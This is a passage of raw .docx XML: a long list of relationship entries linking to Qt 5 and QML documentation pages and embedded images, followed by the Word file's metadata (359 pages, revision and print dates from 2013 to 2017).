Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-multipointtoucharea.html" TargetMode="External"/><Relationship Id="rId2163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId2370" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rectangle.html" TargetMode="External"/><Relationship Id="rId3007" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-qtquicktest.html" TargetMode="External"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-quaternion.html" TargetMode="External"/><Relationship Id="rId342" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qtcreator/creator-quick-ui-forms.html" TargetMode="External"/><Relationship Id="rId787" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtmultimedia-cameraexposure.html" TargetMode="External"/><Relationship Id="rId994" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-input-inputchord.html" TargetMode="External"/><Relationship Id="rId2023" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/sg-renderloop-singlethreaded.jpg" TargetMode="External"/><Relationship Id="rId2230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mouseevent.html" TargetMode="External"/><Relationship Id="rId2468" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-propertyanimation.html" TargetMode="External"/><Relationship Id="rId2675" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-performance.html" TargetMode="External"/><Relationship Id="rId2882" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickwindow.html" TargetMode="External"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId647" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-models-listmodel.html" TargetMode="External"/><Relationship Id="rId854" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtlocation-contactdetails.html" TargetMode="External"/><Relationship Id="rId1277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt-labs-settings-settings.html" TargetMode="External"/><Relationship Id="rId1484" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-loader.html" TargetMode="External"/><Relationship Id="rId1691" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-gridlayout.html" TargetMode="External"/><Relationship Id="rId2328" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId2535" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-animation-example.html" TargetMode="External"/><Relationship Id="rId2742" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-var.html" TargetMode="External"/><Relationship Id="rId507" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-positioning-righttoleft.html" TargetMode="External"/><Relationship Id="rId714" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-alphacoverage.html" TargetMode="External"/><Relationship Id="rId921" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt-labs-platform-filedialog.html" TargetMode="External"/><Relationship Id="rId1137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-parameter.html" TargetMode="External"/><Relationship Id="rId1344" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-styles-switchstyle.html" TargetMode="External"/><Relationship Id="rId1551" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId1789" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId1996" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgsimplematerialshader.html" TargetMode="External"/><Relationship Id="rId2602" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-component.html" TargetMode="External"/><Relationship Id="rId1204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-statemachine-qabstractstate.html" TargetMode="External"/><Relationship Id="rId1411" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-extras-tumbler.html" TargetMode="External"/><Relationship Id="rId1649" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId1856" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-particles-system-content-dynamicemitters-qml.html" TargetMode="External"/><Relationship Id="rId2907" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlcomponent.html" TargetMode="External"/><Relationship Id="rId1509" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qtobject.html" TargetMode="External"/><Relationship Id="rId1716" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId1923" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlengine.html" TargetMode="External"/><Relationship Id="rId2185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickview.html" TargetMode="External"/><Relationship Id="rId2392" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-statesanimations-animations.html" TargetMode="External"/><Relationship Id="rId3029" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image59.png"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-cppintegration-definetypes.html" TargetMode="External"/><Relationship Id="rId364" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qtcreator/creator-running-targets.html" TargetMode="External"/><Relationship Id="rId2045" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgnode.html" TargetMode="External"/><Relationship Id="rId2697" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-connections.html" TargetMode="External"/><Relationship Id="rId571" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://qt-project.org/doc/qt-5.1/qtquick/qtquick-effects-particles.html" TargetMode="External"/><Relationship Id="rId669" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-performance.html" TargetMode="External"/><Relationship Id="rId876" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-extras-delaybutton.html" TargetMode="External"/><Relationship Id="rId1299" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-extras-spheremesh.html" TargetMode="External"/><Relationship Id="rId2252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2557" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/listview-decorations.png" TargetMode="External"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qjsvalue.html" TargetMode="External"/><Relationship Id="rId431" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-typesystem-topic.html" TargetMode="External"/><Relationship Id="rId529" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-layouts-example.html" TargetMode="External"/><Relationship Id="rId736" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtaudioengine-attenuationmodellinear.html" TargetMode="External"/><Relationship Id="rId1061" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtsensors-magnetometer.html" TargetMode="External"/><Relationship Id="rId1159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-extras-pervertexcolormaterial.html" TargetMode="External"/><Relationship Id="rId1366" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-textedit.html" TargetMode="External"/><Relationship Id="rId2112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-index.html" TargetMode="External"/><Relationship Id="rId2417" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-parentchange.html" TargetMode="External"/><Relationship Id="rId2764" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-cppintegration-definetypes.html" TargetMode="External"/><Relationship Id="rId2971" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquickdialogs-index.html" TargetMode="External"/><Relationship Id="rId943" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-friction.html" TargetMode="External"/><Relationship Id="rId1019" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwinextras-jumplistlink.html" TargetMode="External"/><Relationship Id="rId1573" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-visualcanvas-topic.html" TargetMode="External"/><Relationship Id="rId1780" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-stacklayout.html" TargetMode="External"/><Relationship Id="rId1878" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-particlepainter.html" TargetMode="External"/><Relationship Id="rId2624" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qabstractitemmodel.html" TargetMode="External"/><Relationship Id="rId2831" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsggeometrynode.html" TargetMode="External"/><Relationship Id="rId2929" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-javascript-expressions.html" TargetMode="External"/><Relationship Id="rId803" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcanvas3d-canvas3dprogram.html" TargetMode="External"/><Relationship Id="rId1226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-rectangleshape.html" TargetMode="External"/><Relationship Id="rId1433" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-viewport.html" TargetMode="External"/><Relationship Id="rId1640" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-xmllistmodel-xmlrole.html" TargetMode="External"/><Relationship Id="rId1738" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId1500" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId1945" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qttest-testcase.html" TargetMode="External"/><Relationship Id="rId1805" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-dialogs-filedialog.html" TargetMode="External"/><Relationship Id="rId3020" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qtcreator/quick-projec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01456D-449A-4ADE-A966-DFA1981A10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51028</TotalTime>
  <Pages>359</Pages>
  <Words>147207</Words>
  <Characters>839081</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>6992</Lines>
  <Paragraphs>1968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984320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Roman</cp:lastModifiedBy>
  <cp:revision>24545</cp:revision>
  <cp:lastPrinted>2017-05-26T20:03:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-09-02T11:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-05-26T20:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>